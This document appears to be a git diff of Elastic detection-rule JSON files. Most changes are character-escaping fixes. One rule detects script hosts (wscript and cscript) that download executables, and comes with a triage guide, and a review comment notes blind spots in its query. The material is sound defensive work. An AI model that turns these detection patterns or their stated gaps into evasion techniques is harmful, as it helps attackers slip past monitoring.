!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_108.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_108.json index 8d881143c8f..9385be2eb80 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_108.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", "related_integrations": [ { @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_104.json b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_104.json index 04046e907a0..809be8cfe4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_104.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
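Review bot: The investigation guide in the new `note` still tells analysts to search for 4624 logon events "to the target host after the registry modification", but this rule ("Remote File Download via Script Interpreter") involves no registry modification — the query sequences a non-DNS outbound connection from `wscript.exe`/`cscript.exe` with a subsequent `exe`/`dll` file creation, so the sentence reads as inherited from another guide; I would change it to `...login events (for example, 4624) to the target host after the file download.` Separately, the context `query` line restricts the first event to `network.type == "ipv4"` and only excludes `127.0.0.1`, so an IPv6 egress (or IPv6 loopback) by the script host never starts the sequence, and the `sequence by host.id, process.entity_id` has no `with maxspan=...`, so the file creation may be matched arbitrarily long after the connection — both are worth a deliberate decision and a one-line comment if intentional. This `_108.json` is presumably a generated snapshot of the upstream rule version, so the wording fix belongs in the source rule (as a new version) rather than in this file; the enclosing rule object starts and ends outside the hunk.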
diff --git a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_105.json b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_105.json index dd611092cbe..287a5c9c2a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_105.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_106.json b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_106.json index b46b1f655eb..aa43ecb96b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_106.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_107.json b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_107.json index 0911b5c8be9..ef0c10d39ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_107.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_2.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_2.json index caeb2831ea3..7c4a7e1c348 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_2.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_3.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_3.json index ddc31dc6409..a87f72ca0c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_3.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_4.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_4.json index 6d0e1e69830..2e49af2158e 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_5.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_5.json index 9472f1cd213..4bcdf2f487f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_5.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_102.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_102.json index 3341b351e4e..f16756e838d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_102.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_103.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_103.json index e658a6b8fea..383d35ba352 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_103.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_104.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_104.json index 29f4dd29a2f..597982b6cdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_105.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_105.json index f3134860dba..55f1b4e6586 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_105.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_106.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_106.json index a0502e4b5a0..867e6a0d218 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_106.json 
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -107,7 +107,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_2.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_2.json
index 46dc0e8cb83..13700f25986 100644
--- a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_2.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_3.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_3.json
index e5551aa2d93..01fbeeb8a1a 100644
--- a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_3.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_4.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_4.json
index 543bec020ae..7b1bc4d6a47 100644
--- a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_4.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
